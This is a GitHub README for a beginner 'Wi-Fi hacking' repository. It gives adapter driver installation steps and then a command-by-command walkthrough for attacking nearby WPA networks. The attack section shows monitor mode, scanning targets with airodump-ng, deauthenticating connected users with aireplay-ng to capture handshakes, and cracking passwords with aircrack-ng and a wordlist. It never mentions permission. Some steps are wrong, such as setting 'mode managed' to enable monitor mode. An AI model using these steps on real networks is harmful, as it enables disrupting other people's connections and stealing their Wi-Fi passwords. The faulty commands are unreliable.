Skip to content

Krishnazzz/Wifi_hacking

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

5 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Installation of Wi-fi DRIVES

Install One Shot

Copy and past on your's Kali Terminal πŸ™‚

git clone https://github.com/Krishnazzz/Wifi_hacking.git && cd Wifi_hacking && chmod +x install.sh && ./install.sh

Install Manually

Download Driver tar file from above on your system Go to you download dir where it is install

  cd Downloads

Extract it

extract it manual or use :

  tar -xjvf compat-wireless-2010-06-28.tar.bz2 

go inside the dir of compact-wireless

cd compat-wireless-2010-06-28/

Run both the commands :

sudo make unload 
sudo make load 

Restart your system

init 6

Check is it working or not

type to check wlan0 or wlan1 interface showing or not

iwconfig

installation of Adapter DRIVERS

In my case im using TP-LINK Archer T2U Plus AC600

tp-link adapter

Why should i buy this adapter ?

This adapter has a Realtek RTL8821AU Chipset . It will cost u β‚Ή1,100 or maybe less . it have a good range and It support in linux community and has driver for Kali linux , Parrot OS .etc Archer T2U Plus is on sale under 1000 INR , which is a very affordable price and it too good in my opinion for Beginners in Pentesting.

Where to buy

πŸ‘‰Amazon

πŸ‘‰Flipkart

πŸ‘‰AC1300 T3U

To install tp-link T2U plus Driver for Debian Based Linux Distros (Ubuntu/Kali Linux)(x86_64) :

  1. Update the package information :
sudo apt update -y 
  1. Install dkms and git :
sudo apt install dkms git
  1. Install Build Dependencies :
sudo apt install build-essential libelf-dev linux-headers-$(uname -r)
  1. Download the Driver files using git :
git clone https://github.com/aircrack-ng/rtl8812au.git
  1. Navigate to the Downloaded directory :
cd rtl88*
  1. Install the Driver
sudo make dkms_install
  1. Check the wireless interfaces by typing :
lsusb

or

iwconfig

8. Uninstall Driver in Linux :

  • Check the module name and version using the command sudo dkms status.
$ dkms status  
8812au, 5.6.4.2_35491.20191025, 5.10.63+, armv6l: installed  
rtl8188fu, 1.0, 5.10.63+, armv6l: installed.
  • here module name is 8812au and module version is 5.6.4.2_35491.20191025.
  • use
sudo dkms remove <module>/<module-version>.
$ sudo dkms remove 8812au/5.6.4.2_35491.20191025 --all  

Deleting module version: 5.6.4.2_35491.20191025 completely from the DKMS tree.  

Done.  
  • delete this file using sudo rm -rf /var/lib/dkms/8812au/.

Wi-Fi Hacking Tutorial for beginners

step 1. Monitor mode

First you need adapter who's support Monitor mode && packet injection if u using this TP-link T2U plus. So ur ready

give root permision so it more comfortable :

sudo sudo
su root

Using iwconfig check wheather adapter is Managed mode or Monitor mode.

iwconfig

hmm i know it on Managed mode

Screenshot 2023-10-17 214221

1. Kill all background process to do it (it dissconnect ur network so don't get panic) :

airmon-ng check kill

Screenshot 2023-10-17 221157

  • wlan0 => interface name .
  • WIFI@REALTEK => Is wlan0 nickname u can use both but reccommended wlan0.
  • if u have already connected to wifi sometime it show wlan1 or wlan2 rather than wlna0 (in case u have 2 adpater 1 for wifi and second to attack)

2. bring interface down to make it Monitor mode

ifconfig wlan0 down

3. to make it Monitormode

iwconfig wlan0 mode managed 

4. bring interface up again :

ifconfig wlan0 up

5. Now its on monitor mode check using :

iwconfig 

Screenshot 2023-10-17 221254

2. Or not doing all this time wast u can do Directly this Monitor mode by using 😁 :

airmon-ng start wlan0   

step 2. Check for nearby network

to check use :

it will show u all routers

airodump-ng wlan0   

ctrl + c => to stop

Screenshot 2023-10-17 221340

  • Copy bssid ofnetwork u like (bssid = mac address show on first row)
  • also note the ch (channel number of same router)

step 3. Check devices connect to that network and capture Handshake-file

  • --bssid => whom u going to attack

  • --channel => to give channel number if it or use [(-c) for channel but sometime it didn't work well ]

  • station => is the device connectedto router. Screenshot 2023-10-17 221650

  • --write => to creat a file where my handshake store

airodump-ng wlan0 --bssid --channel --write /path/Meow.txt
airodump-ng wlan0 --bssid -c -w /path/Meow.txt

for an example

airodump-ng wlan0 --bssid 3C:46:45:1D:5D:31 --channel 11  -w /home/death/Meow.txt

Screenshot 2023-10-17 221855

step 4. kick off people form there network / deauthentication attack

  • aireplay-ng is powerfull we using itfor deauth people and capture handshake when they try to reconnect.
  • -a => router mac addrs.
  • -c => device connected with router we going to deauthenticate.
  • --deauth / -0 => to send number of deauth packeges.
aireplay-ng wlan0 -a -c  --deauth 10
aireplay-ng wlan0 -a <bssid> -c <station>  -0 <number of packages>

for example

aireplay-ng wlan0 -a 3C:46:45:1D:5D:31 -c D4:36:89:A4:7R:29 --deauth 10

To deauth on whole network use :

aireplay-ng wlan0 -a <bssid> -0 <deauth n.o packages>

your handshake-file will be stored in the path u give

  • .cap is the file fo capture handshake . In my case is Meow.txt.cap
  • so we going to crack it by aircrack-ng with wordlists.

step 5. Crack the password / handshake file.

To crack capture handshake we using aircrack-ng fast cracking tool

  • -w to give wordlist.
  • u got so many file but we need .cap file where handshake stored.
  • if it not deauth another device.
  • gzip -d /usr/share/wordlist/rockyou.txt (if it not) Screenshot 2023-10-17 225232
aircrack-ng Meow.txt.cap -w /usr/share/rockyou.txt

Screenshot 2023-10-17 225248

  • when it will crack it shou the password.

Features

  • install wlan0
  • Kali , parrot ubuntu install Wi-fi drivers.
  • enable Monitor mode.
  • Scan localarea wifi networks.
  • deauth devices.
  • capture handshake file.
  • crack handshake ushing aircrack

Other Common Github Profile Sections

πŸ‘©β€πŸ’» I'm currently student

🧠 I'm currently learning more C.E.H

πŸ‘―β€β™€οΈ to be honest i take help of @Esther7171 credit to him as well.

πŸ€” i though to combine all so it easy for begginer bez at start i didn't find a proper tutorial.

πŸ’¬ Ask me about... "Nothing"

πŸ“« How to reach me... "@psychix_krishnaaa" instagram only please

⚑️ nothing much to write

For queerys u can ask me on my instagram

@psychix_krishnaaa
my username

Badges

just for fun i use this on tested purpose hehehehe

MIT License GPLv3 License AGPL License

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages